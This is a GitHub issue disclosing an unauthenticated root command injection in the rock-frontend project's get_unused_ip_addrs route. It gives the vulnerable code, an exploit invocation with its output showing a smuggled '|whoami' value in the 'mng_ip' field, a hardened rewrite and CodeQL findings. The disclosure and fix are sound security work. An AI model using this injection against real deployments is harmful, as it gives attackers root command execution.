grantcurell / rock-frontend

GNU General Public License v3.0

rock-frontend Remote Code Execution Vulnerability #1

Open ceballosm opened 5 years ago

ceballosm commented 5 years ago

rock-frontend kickstart_controller.py does not sanitize user input in get_unused_ip_addrs(), allowing for remote unauthenticated code execution.

The vulnerability can be viewed here:

 97 @app.route('/api/get_unused_ip_addrs', methods=['POST'])
 98 def get_unused_ip_addrs() -> Response:
 99     """
100     Gets unused IP Addresses from a given network.
101     :return:
102     """
103     payload = request.get_json()
104     cidr = netmask_to_cidr(payload['netmask'])
105     if cidr <= 24:
106         command = "nmap -v -sn -n %s/24 -oG - | awk '/Status: Down/{print $2}'" % payload['mng_ip']
107     else:
....

On line 106, the JSON field 'mng_ip' can be abused by appending shell meta-characters to the user-controlled IP value, allowing for arbitrary OS commands. Once interpreted, the OS commands will run as root.

$ ruby rock-frontend_exploit_1.rb 192.168.2.113 "whoami && pwd && ps aux|grep whoami"
root
/opt/rock-frontend/backend
root      3704  0.0  0.0 115248  1420 ?        S    10:02   0:00 /bin/sh -c nmap -v -sn -n 192.168.1.163|whoami && pwd && ps aux|grep whoami||''|/24 -oG - | awk '/Status: Down/{print $2}'
root      3708  0.0  0.0 112648   940 ?        R    10:02   0:00 grep whoami
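For comparison, here is how the route above would look with the injection removed. This is an added example written for this issue, not code from the rock-frontend project: it assumes a netmask_to_cidr() built on the ipaddress module (the project's own implementation is not shown here) and, since the issue only shows the `cidr <= 24` branch, assumes the other branch scans the actual prefix.

```python
import ipaddress
import subprocess


def netmask_to_cidr(netmask: str) -> int:
    """Prefix length of a dotted-quad netmask, e.g. 255.255.255.0 -> 24 (assumed implementation)."""
    return ipaddress.IPv4Network(f"0.0.0.0/{netmask}").prefixlen


def build_scan_argv(payload: dict) -> list:
    """Validate the JSON payload and return the nmap command as an argument list.

    The original builds a shell string with "%s" % payload['mng_ip'], so
    '192.168.1.163|whoami' is handed straight to /bin/sh. Here the value must
    parse as a literal IPv4 address (ipaddress raises ValueError otherwise) and
    the result is an argv list, so no shell is ever involved.
    """
    mng_ip = ipaddress.IPv4Address(payload["mng_ip"])  # rejects anything that is not an address
    cidr = netmask_to_cidr(payload["netmask"])
    prefix = 24 if cidr <= 24 else cidr  # else branch not shown in the issue; assumed to use the real prefix
    network = ipaddress.IPv4Network(f"{mng_ip}/{prefix}", strict=False)
    return ["nmap", "-v", "-sn", "-n", str(network), "-oG", "-"]


def parse_down_hosts(grepable_output: str) -> list:
    """Replaces the awk '/Status: Down/{print $2}' pipe stage: second field of each 'Status: Down' line."""
    return [line.split()[1] for line in grepable_output.splitlines() if "Status: Down" in line]


def get_unused_ip_addrs(payload: dict) -> list:
    """Hardened equivalent of the vulnerable route body: validated argv, shell=False, parsing in Python."""
    argv = build_scan_argv(payload)
    completed = subprocess.run(argv, capture_output=True, text=True, check=True)
    return parse_down_hosts(completed.stdout)


# Constructed sample of nmap -oG output, used only to exercise parse_down_hosts() offline.
SAMPLE_GNMAP = (
    "# Nmap 7.80 scan initiated (constructed sample)\n"
    "Host: 192.168.1.1 ()\tStatus: Up\n"
    "Host: 192.168.1.2 ()\tStatus: Down\n"
    "Host: 192.168.1.3 ()\tStatus: Down\n"
    "# Nmap done\n"
)
```

With the argument-list form, a payload such as the one in the process listing above fails at IPv4Address() with a ValueError instead of reaching a shell.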
ceballosm commented 5 years ago

Running that application through CodeQL with a simple query like so:

import python 
...

exists(GlobalVariable os | os = ((Name)c.getFunc()).getVariable() and os.getId() = "shell")
...

Other similar issues popped up.

shell()
common_controller.py:148    Potential OS Command Injection.

shell()
health_controller.py:27     Potential OS Command Injection.

shell()
health_controller.py:47     Potential OS Command Injection.

shell()
kickstart_controller.py:27  Potential OS Command Injection.

shell()
kickstart_controller.py:110 Potential OS Command Injection.